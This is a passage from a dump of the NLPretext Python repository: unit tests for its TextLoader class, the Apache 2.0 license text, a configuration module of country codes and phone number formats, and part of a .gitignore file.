164 | @patch("nlpretext._utils.pandasloader.read_csv")
165 | def test__read_text_csv_pandas(mock_read):
166 | # Given
167 | files_path = "some_path/to_read.txt"
168 | file_format = "txt"
169 | encoding = "utf-8"
170 | text_column = "text"
171 |
172 | dummy_instance = TextLoader(
173 | file_format=file_format,
174 | use_dask=False,
175 | encoding=encoding,
176 | text_column=text_column,
177 | )
178 | dummy_instance._read_text_csv(files_path)
179 |
180 | # Then
181 | mock_read.assert_called_once_with(files_path, encoding=encoding)
182 |
183 |
184 | @patch("dask.dataframe.read_parquet")
185 | def test__read_text_parquet_dask(mock_read_parquet):
186 | # Given
187 | files_path = "some_path/to_read.parquet"
188 | file_format = "parquet"
189 | encoding = "utf-8"
190 | text_column = "text"
191 |
192 | text_ddf = dd.from_pandas(
193 | pd.DataFrame({text_column: ["This is a text", "This is another text"]}),
194 | npartitions=2,
195 | )
196 | mock_read_parquet.return_value = text_ddf
197 |
198 | expected_result = text_ddf[[text_column]]
199 |
200 | # When
201 | dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column)
202 | actual_result = dummy_instance._read_text_parquet(files_path)
203 |
204 | # Then
205 | mock_read_parquet.assert_called_once_with(files_path, encoding=encoding)
206 | assert_frame_equal(expected_result.compute(), actual_result.compute())
207 |
208 |
209 | @patch("nlpretext._utils.pandasloader.read_parquet")
210 | def test__read_text_parquet_pandas(mock_read):
211 | # Given
212 | files_path = "some_path/to_read.txt"
213 | file_format = "txt"
214 | encoding = "utf-8"
215 | text_column = "text"
216 |
217 | dummy_instance = TextLoader(
218 | file_format=file_format,
219 | use_dask=False,
220 | encoding=encoding,
221 | text_column=text_column,
222 | )
223 | dummy_instance._read_text_parquet(files_path)
224 |
225 | # Then
226 | mock_read.assert_called_once_with(files_path, encoding=encoding)
227 |
228 |
229 | @pytest.mark.parametrize(
230 | "files_path, file_format, encoding, compute_to_pandas, preprocessor, expected_format, raised",
231 | [
232 | ("text_file1.json", None, None, True, None, "json", None),
233 | ("text_file2.json", "json", None, True, None, "json", None),
234 | ("text_file3.csv", None, "utf-8", True, None, "csv", None),
235 | ("text_file4.csv", None, None, False, None, "csv", None),
236 | ("text_file3.parquet", None, "utf-8", True, None, "parquet", None),
237 | ("text_file4.parquet", None, None, False, None, "parquet", None),
238 | ("text_file5.pdf", "pdf", None, False, None, "csv", "Format not handled"),
239 | ("text_file6.txt", None, None, False, Preprocessor(), "txt", None),
240 | (
241 | "text_file8.txt",
242 | None,
243 | None,
244 | False,
245 | MagicMock(),
246 | "txt",
247 | "Only NLPretext preprocessors can be specified",
248 | ),
249 | ],
250 | )
251 | @patch("nlpretext.preprocessor.Preprocessor.run", return_value="This is a text", autospec=True)
252 | @patch("nlpretext.textloader.TextLoader._read_text_json")
253 | @patch("nlpretext.textloader.TextLoader._read_text_txt")
254 | @patch("nlpretext.textloader.TextLoader._read_text_csv")
255 | @patch("nlpretext.textloader.TextLoader._read_text_parquet")
256 | @patch("nlpretext.textloader.check_text_file_format")
257 | def test_read_text(
258 | mock_check_text_file_format,
259 | mock__read_text_parquet,
260 | mock__read_text_csv,
261 | mock__read_text_txt,
262 | mock__read_text_json,
263 | mock_run,
264 | files_path,
265 | file_format,
266 | encoding,
267 | compute_to_pandas,
268 | preprocessor,
269 | expected_format,
270 | raised,
271 | ):
272 | # Given
273 | text_column = "text"
274 | if encoding is None:
275 | encoding = "utf-8"
276 |
277 | if file_format is None:
278 | mock_check_text_file_format.return_value = expected_format
279 |
280 | mock_reader_mapping = {
281 | "csv": mock__read_text_csv,
282 | "txt": mock__read_text_txt,
283 | "json": mock__read_text_json,
284 | "parquet": mock__read_text_parquet,
285 | }
286 |
287 | expected_result = dd.from_pandas(
288 | pd.DataFrame({text_column: ["Text with #", "Text with double space"]}),
289 | npartitions=2,
290 | )
291 | mock_reader_mapping.get(expected_format).return_value = expected_result # type: ignore
292 |
293 | # When
294 | dummy_textloader = TextLoader(
295 | text_column=text_column, encoding=encoding, file_format=file_format
296 | )
297 |
298 | if raised is None:
299 | actual_result = dummy_textloader.read_text(
300 | files_path, file_format, encoding, compute_to_pandas, preprocessor
301 | )
302 |
303 | # Then
304 | if file_format is None:
305 | mock_check_text_file_format.assert_called_once_with(files_path)
306 |
307 | mock_reader_mapping[expected_format].assert_called_once_with(files_path)
308 |
309 | if preprocessor is not None:
310 | if isinstance(preprocessor, Preprocessor):
311 | mock_run.assert_called()
312 | preprocessed_texts = ["Text with", "Text with double space"]
313 | mock_run.side_effect = preprocessed_texts
314 | expected_result = dd.from_pandas(
315 | pd.DataFrame({text_column: preprocessed_texts}), npartitions=2
316 | )
317 |
318 | if not compute_to_pandas:
319 | actual_result = actual_result.compute()
320 | assert_frame_equal(expected_result.compute(), actual_result)
321 |
322 | else:
323 | with pytest.raises(ValueError, match=raised):
324 | dummy_textloader.read_text(
325 | files_path, file_format, encoding, compute_to_pandas, preprocessor
326 | )
327 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright [yyyy] [name of copyright owner]
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 | © 2021 GitHub, Inc.
203 | Terms
204 | Privacy
205 | Security
206 | Status
207 | Docs
208 | Contact GitHub
209 | Pricing
210 | API
211 | Training
212 | Blog
213 | About
214 |
--------------------------------------------------------------------------------
/nlpretext/_config/config.py:
--------------------------------------------------------------------------------
1 | # GNU Lesser General Public License v3.0 only
2 | # Copyright (C) 2020 Artefact
3 | # licence-information@artefact.com
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU Lesser General Public
7 | # License as published by the Free Software Foundation; either
8 | # version 3 of the License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # Lesser General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU Lesser General Public License
16 | # along with this program; if not, write to the Free Software Foundation,
17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
18 | #!/usr/local/bin/python3
19 | from typing import List, Optional
20 |
21 | import os
22 |
23 | import phonenumbers as _phonenumbers
24 |
25 | ROOT_FOLDER = os.path.abspath(os.path.join(os.path.dirname(__file__), "../.."))
26 |
27 | # Country config
28 | COUNTRY_MAPPING_ISO = {
29 | "af": "Afghanistan",
30 | "ax": "Åland Islands",
31 | "al": "Albania",
32 | "dz": "Algeria",
33 | "as": "American Samoa",
34 | "ad": "Andorra",
35 | "ao": "Angola",
36 | "ai": "Anguilla",
37 | "aq": "Antarctica",
38 | "ag": "Antigua and Barbuda",
39 | "ar": "Argentina",
40 | "am": "Armenia",
41 | "aw": "Aruba",
42 | "au": "Australia",
43 | "at": "Austria",
44 | "az": "Azerbaijan",
45 | "bs": "Bahamas",
46 | "bh": "Bahrain",
47 | "bd": "Bangladesh",
48 | "bb": "Barbados",
49 | "by": "Belarus",
50 | "be": "Belgium",
51 | "bz": "Belize",
52 | "bj": "Benin",
53 | "bm": "Bermuda",
54 | "bt": "Bhutan",
55 | "bo": "Bolivia (Plurinational State of)",
56 | "bq": "Bonaire, Sint Eustatius and Saba",
57 | "ba": "Bosnia and Herzegovina",
58 | "bw": "Botswana",
59 | "bv": "Bouvet Island",
60 | "br": "Brazil",
61 | "io": "British Indian Ocean Territory",
62 | "bn": "Brunei Darussalam",
63 | "bg": "Bulgaria",
64 | "bf": "Burkina Faso",
65 | "bi": "Burundi",
66 | "cv": "Cabo Verde",
67 | "kh": "Cambodia",
68 | "cm": "Cameroon",
69 | "ca": "Canada",
70 | "ky": "Cayman Islands",
71 | "cf": "Central African Republic",
72 | "td": "Chad",
73 | "cl": "Chile",
74 | "cn": "China",
75 | "cx": "Christmas Island",
76 | "cc": "Cocos (Keeling) Islands",
77 | "co": "Colombia",
78 | "km": "Comoros",
79 | "cg": "Congo",
80 | "cd": "Congo, Democratic Republic of the",
81 | "ck": "Cook Islands",
82 | "cr": "Costa Rica",
83 | "ci": "Côte d'Ivoire",
84 | "hr": "Croatia",
85 | "cu": "Cuba",
86 | "cw": "Curaçao",
87 | "cy": "Cyprus",
88 | "cz": "Czechia",
89 | "dk": "Denmark",
90 | "dj": "Djibouti",
91 | "dm": "Dominica",
92 | "do": "Dominican Republic",
93 | "ec": "Ecuador",
94 | "eg": "Egypt",
95 | "sv": "El Salvador",
96 | "gq": "Equatorial Guinea",
97 | "er": "Eritrea",
98 | "ee": "Estonia",
99 | "sz": "Eswatini",
100 | "et": "Ethiopia",
101 | "fk": "Falkland Islands (Malvinas)",
102 | "fo": "Faroe Islands",
103 | "fj": "Fiji",
104 | "fi": "Finland",
105 | "fr": "France",
106 | "gf": "French Guiana",
107 | "pf": "French Polynesia",
108 | "tf": "French Southern Territories",
109 | "ga": "Gabon",
110 | "gm": "Gambia",
111 | "ge": "Georgia",
112 | "de": "Germany",
113 | "gh": "Ghana",
114 | "gi": "Gibraltar",
115 | "gr": "Greece",
116 | "gl": "Greenland",
117 | "gd": "Grenada",
118 | "gp": "Guadeloupe",
119 | "gu": "Guam",
120 | "gt": "Guatemala",
121 | "gg": "Guernsey",
122 | "gn": "Guinea",
123 | "gw": "Guinea-Bissau",
124 | "gy": "Guyana",
125 | "ht": "Haiti",
126 | "hm": "Heard Island and McDonald Islands",
127 | "va": "Holy See",
128 | "hn": "Honduras",
129 | "hk": "Hong Kong",
130 | "hu": "Hungary",
131 | "is": "Iceland",
132 | "in": "India",
133 | "id": "Indonesia",
134 | "ir": "Iran (Islamic Republic of)",
135 | "iq": "Iraq",
136 | "ie": "Ireland",
137 | "im": "Isle of Man",
138 | "il": "Israel",
139 | "it": "Italy",
140 | "jm": "Jamaica",
141 | "jp": "Japan",
142 | "je": "Jersey",
143 | "jo": "Jordan",
144 | "kz": "Kazakhstan",
145 | "ke": "Kenya",
146 | "ki": "Kiribati",
147 | "kp": "Korea (Democratic People's Republic of)",
148 | "kr": "Korea, Republic of",
149 | "kw": "Kuwait",
150 | "kg": "Kyrgyzstan",
151 | "la": "Lao People's Democratic Republic",
152 | "lv": "Latvia",
153 | "lb": "Lebanon",
154 | "ls": "Lesotho",
155 | "lr": "Liberia",
156 | "ly": "Libya",
157 | "li": "Liechtenstein",
158 | "lt": "Lithuania",
159 | "lu": "Luxembourg",
160 | "mo": "Macao",
161 | "mg": "Madagascar",
162 | "mw": "Malawi",
163 | "my": "Malaysia",
164 | "mv": "Maldives",
165 | "ml": "Mali",
166 | "mt": "Malta",
167 | "mh": "Marshall Islands",
168 | "mq": "Martinique",
169 | "mr": "Mauritania",
170 | "mu": "Mauritius",
171 | "yt": "Mayotte",
172 | "mx": "Mexico",
173 | "fm": "Micronesia (Federated States of)",
174 | "md": "Moldova, Republic of",
175 | "mc": "Monaco",
176 | "mn": "Mongolia",
177 | "me": "Montenegro",
178 | "ms": "Montserrat",
179 | "ma": "Morocco",
180 | "mz": "Mozambique",
181 | "mm": "Myanmar",
182 | "na": "Namibia",
183 | "nr": "Nauru",
184 | "np": "Nepal",
185 | "nl": "Netherlands",
186 | "nc": "New Caledonia",
187 | "nz": "New Zealand",
188 | "ni": "Nicaragua",
189 | "ne": "Niger",
190 | "ng": "Nigeria",
191 | "nu": "Niue",
192 | "nf": "Norfolk Island",
193 | "mk": "North Macedonia",
194 | "mp": "Northern Mariana Islands",
195 | "no": "Norway",
196 | "om": "Oman",
197 | "pk": "Pakistan",
198 | "pw": "Palau",
199 | "ps": "Palestine, State of",
200 | "pa": "Panama",
201 | "pg": "Papua New Guinea",
202 | "py": "Paraguay",
203 | "pe": "Peru",
204 | "ph": "Philippines",
205 | "pn": "Pitcairn",
206 | "pl": "Poland",
207 | "pt": "Portugal",
208 | "pr": "Puerto Rico",
209 | "qa": "Qatar",
210 | "re": "Réunion",
211 | "ro": "Romania",
212 | "ru": "Russian Federation",
213 | "rw": "Rwanda",
214 | "bl": "Saint Barthélemy",
215 | "sh": "Saint Helena, Ascension and Tristan da Cunha",
216 | "kn": "Saint Kitts and Nevis",
217 | "lc": "Saint Lucia",
218 | "mf": "Saint Martin (French part)",
219 | "pm": "Saint Pierre and Miquelon",
220 | "vc": "Saint Vincent and the Grenadines",
221 | "ws": "Samoa",
222 | "sm": "San Marino",
223 | "st": "Sao Tome and Principe",
224 | "sa": "Saudi Arabia",
225 | "sn": "Senegal",
226 | "rs": "Serbia",
227 | "sc": "Seychelles",
228 | "sl": "Sierra Leone",
229 | "sg": "Singapore",
230 | "sx": "Sint Maarten (Dutch part)",
231 | "sk": "Slovakia",
232 | "si": "Slovenia",
233 | "sb": "Solomon Islands",
234 | "so": "Somalia",
235 | "za": "South Africa",
236 | "gs": "South Georgia and the South Sandwich Islands",
237 | "ss": "South Sudan",
238 | "es": "Spain",
239 | "lk": "Sri Lanka",
240 | "sd": "Sudan",
241 | "sr": "Suriname",
242 | "sj": "Svalbard and Jan Mayen",
243 | "se": "Sweden",
244 | "ch": "Switzerland",
245 | "sy": "Syrian Arab Republic",
246 | "tw": "Taiwan, Province of China",
247 | "tj": "Tajikistan",
248 | "tz": "Tanzania, United Republic of",
249 | "th": "Thailand",
250 | "tl": "Timor-Leste",
251 | "tg": "Togo",
252 | "tk": "Tokelau",
253 | "to": "Tonga",
254 | "tt": "Trinidad and Tobago",
255 | "tn": "Tunisia",
256 | "tr": "Turkey",
257 | "tm": "Turkmenistan",
258 | "tc": "Turks and Caicos Islands",
259 | "tv": "Tuvalu",
260 | "ug": "Uganda",
261 | "ua": "Ukraine",
262 | "ae": "United Arab Emirates",
263 | "gb": "United Kingdom of Great Britain and Northern Ireland",
264 | "us": "United States of America",
265 | "um": "United States Minor Outlying Islands",
266 | "uy": "Uruguay",
267 | "uz": "Uzbekistan",
268 | "vu": "Vanuatu",
269 | "ve": "Venezuela (Bolivarian Republic of)",
270 | "vn": "Viet Nam",
271 | "vg": "Virgin Islands (British)",
272 | "vi": "Virgin Islands (U.S.)",
273 | "wf": "Wallis and Futuna",
274 | "eh": "Western Sahara",
275 | "ye": "Yemen",
276 | "zm": "Zambia",
277 | "zw": "Zimbabwe",
278 | }
279 |
280 | # Phone numbers config
281 | SUPPORTED_COUNTRY: List[Optional[str]] = [
282 | None,
283 | "US",
284 | "AG",
285 | "AI",
286 | "AS",
287 | "BB",
288 | "BM",
289 | "BS",
290 | "CA",
291 | "DM",
292 | "GD",
293 | "GU",
294 | "JM",
295 | "KN",
296 | "KY",
297 | "LC",
298 | "MP",
299 | "MS",
300 | "PR",
301 | "SX",
302 | "TC",
303 | "TT",
304 | "VC",
305 | "VG",
306 | "VI",
307 | "RU",
308 | "KZ",
309 | "EG",
310 | "ZA",
311 | "GR",
312 | "NL",
313 | "BE",
314 | "FR",
315 | "ES",
316 | "HU",
317 | "IT",
318 | "VA",
319 | "RO",
320 | "CH",
321 | "AT",
322 | "GB",
323 | "GG",
324 | "IM",
325 | "JE",
326 | "DK",
327 | "SE",
328 | "NO",
329 | "SJ",
330 | "PL",
331 | "DE",
332 | "PE",
333 | "MX",
334 | "CU",
335 | "AR",
336 | "BR",
337 | "CL",
338 | "CO",
339 | "VE",
340 | "MY",
341 | "AU",
342 | "CC",
343 | "CX",
344 | "ID",
345 | "PH",
346 | "NZ",
347 | "SG",
348 | "TH",
349 | "JP",
350 | "KR",
351 | "VN",
352 | "CN",
353 | "TR",
354 | "IN",
355 | "PK",
356 | "AF",
357 | "LK",
358 | "MM",
359 | "IR",
360 | "SS",
361 | "MA",
362 | "EH",
363 | "DZ",
364 | "TN",
365 | "LY",
366 | "GM",
367 | "SN",
368 | "MR",
369 | "ML",
370 | "GN",
371 | "CI",
372 | "BF",
373 | "NE",
374 | "TG",
375 | "BJ",
376 | "MU",
377 | "LR",
378 | "SL",
379 | "GH",
380 | "NG",
381 | "TD",
382 | "CF",
383 | "CM",
384 | "CV",
385 | "ST",
386 | "GQ",
387 | "GA",
388 | "CG",
389 | "CD",
390 | "AO",
391 | "GW",
392 | "IO",
393 | "AC",
394 | "SC",
395 | "SD",
396 | "RW",
397 | "ET",
398 | "SO",
399 | "DJ",
400 | "KE",
401 | "TZ",
402 | "UG",
403 | "BI",
404 | "MZ",
405 | "ZM",
406 | "MG",
407 | "RE",
408 | "YT",
409 | "ZW",
410 | "NA",
411 | "MW",
412 | "LS",
413 | "BW",
414 | "SZ",
415 | "KM",
416 | "SH",
417 | "TA",
418 | "ER",
419 | "AW",
420 | "FO",
421 | "GL",
422 | "GI",
423 | "PT",
424 | "LU",
425 | "IE",
426 | "IS",
427 | "AL",
428 | "MT",
429 | "CY",
430 | "FI",
431 | "AX",
432 | "BG",
433 | "LT",
434 | "LV",
435 | "EE",
436 | "MD",
437 | "AM",
438 | "BY",
439 | "AD",
440 | "MC",
441 | "SM",
442 | "UA",
443 | "RS",
444 | "ME",
445 | "XK",
446 | "HR",
447 | "SI",
448 | "BA",
449 | "MK",
450 | "CZ",
451 | "SK",
452 | "LI",
453 | "FK",
454 | "BZ",
455 | "GT",
456 | "SV",
457 | "HN",
458 | "NI",
459 | "CR",
460 | "PA",
461 | "PM",
462 | "HT",
463 | "GP",
464 | "BL",
465 | "MF",
466 | "BO",
467 | "GY",
468 | "EC",
469 | "GF",
470 | "PY",
471 | "MQ",
472 | "SR",
473 | "UY",
474 | "CW",
475 | "BQ",
476 | "TL",
477 | "NF",
478 | "BN",
479 | "NR",
480 | "PG",
481 | "TO",
482 | "SB",
483 | "VU",
484 | "FJ",
485 | "PW",
486 | "WF",
487 | "CK",
488 | "NU",
489 | "WS",
490 | "KI",
491 | "NC",
492 | "TV",
493 | "PF",
494 | "TK",
495 | "FM",
496 | "MH",
497 | "KP",
498 | "HK",
499 | "MO",
500 | "KH",
501 | "LA",
502 | "BD",
503 | "TW",
504 | "MV",
505 | "LB",
506 | "JO",
507 | "SY",
508 | "IQ",
509 | "KW",
510 | "SA",
511 | "YE",
512 | "OM",
513 | "PS",
514 | "AE",
515 | "IL",
516 | "BH",
517 | "QA",
518 | "BT",
519 | "MN",
520 | "NP",
521 | "TJ",
522 | "TM",
523 | "AZ",
524 | "GE",
525 | "KG",
526 | "UZ",
527 | "DO",
528 | ]
529 |
530 | FORMAT_NUMBERS = {
531 | "E164": _phonenumbers.PhoneNumberFormat.E164,
532 | "INTERNATIONAL": _phonenumbers.PhoneNumberFormat.INTERNATIONAL,
533 | "NATIONAL": _phonenumbers.PhoneNumberFormat.NATIONAL,
534 | "RFC3966": _phonenumbers.PhoneNumberFormat.RFC3966,
535 | }
536 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Created by https://www.gitignore.io/api/osx,python,pycharm,windows,visualstudio,visualstudiocode
2 | # Edit at https://www.gitignore.io/?templates=osx,python,pycharm,windows,visualstudio,visualstudiocode
3 |
4 | ### OSX ###
5 | # General
6 | .DS_Store
7 | .AppleDouble
8 | .LSOverride
9 |
10 | # Icon must end with two \r
11 | Icon
12 |
13 | # Thumbnails
14 | ._*
15 |
16 | # Files that might appear in the root of a volume
17 | .DocumentRevisions-V100
18 | .fseventsd
19 | .Spotlight-V100
20 | .TemporaryItems
21 | .Trashes
22 | .VolumeIcon.icns
23 | .com.apple.timemachine.donotpresent
24 |
25 | # Directories potentially created on remote AFP share
26 | .AppleDB
27 | .AppleDesktop
28 | Network Trash Folder
29 | Temporary Items
30 | .apdisk
31 |
32 | ### PyCharm ###
33 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm
34 | # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
35 |
36 | # User-specific stuff
37 | .idea/
38 | .idea/**/workspace.xml
39 | .idea/**/tasks.xml
40 | .idea/**/usage.statistics.xml
41 | .idea/**/dictionaries
42 | .idea/**/shelf
43 |
44 | # Generated files
45 | .idea/**/contentModel.xml
46 |
47 | # Sensitive or high-churn files
48 | .idea/**/dataSources/
49 | .idea/**/dataSources.ids
50 | .idea/**/dataSources.local.xml
51 | .idea/**/sqlDataSources.xml
52 | .idea/**/dynamic.xml
53 | .idea/**/uiDesigner.xml
54 | .idea/**/dbnavigator.xml
55 |
56 | # Gradle
57 | .idea/**/gradle.xml
58 | .idea/**/libraries
59 |
60 | # Gradle and Maven with auto-import
61 | # When using Gradle or Maven with auto-import, you should exclude module files,
62 | # since they will be recreated, and may cause churn. Uncomment if using
63 | # auto-import.
64 | # .idea/modules.xml
65 | # .idea/*.iml
66 | # .idea/modules
67 | # *.iml
68 | # *.ipr
69 |
70 | # CMake
71 | cmake-build-*/
72 |
73 | # Mongo Explorer plugin
74 | .idea/**/mongoSettings.xml
75 |
76 | # File-based project format
77 | *.iws
78 |
79 | # IntelliJ
80 | out/
81 |
82 | # mpeltonen/sbt-idea plugin
83 | .idea_modules/
84 |
85 | # JIRA plugin
86 | atlassian-ide-plugin.xml
87 |
88 | # Cursive Clojure plugin
89 | .idea/replstate.xml
90 |
91 | # Crashlytics plugin (for Android Studio and IntelliJ)
92 | com_crashlytics_export_strings.xml
93 | crashlytics.properties
94 | crashlytics-build.properties
95 | fabric.properties
96 |
97 | # Editor-based Rest Client
98 | .idea/httpRequests
99 |
100 | # Android studio 3.1+ serialized cache file
101 | .idea/caches/build_file_checksums.ser
102 |
103 | ### PyCharm Patch ###
104 | # Comment Reason: https://github.com/joeblau/gitignore.io/issues/186#issuecomment-215987721
105 |
106 | # *.iml
107 | # modules.xml
108 | # .idea/misc.xml
109 | # *.ipr
110 |
111 | # Sonarlint plugin
112 | .idea/**/sonarlint/
113 |
114 | # SonarQube Plugin
115 | .idea/**/sonarIssues.xml
116 |
117 | # Markdown Navigator plugin
118 | .idea/**/markdown-navigator.xml
119 | .idea/**/markdown-navigator/
120 |
121 | ### Python ###
122 | # Byte-compiled / optimized / DLL files
123 | __pycache__/
124 | *.py[cod]
125 | *$py.class
126 |
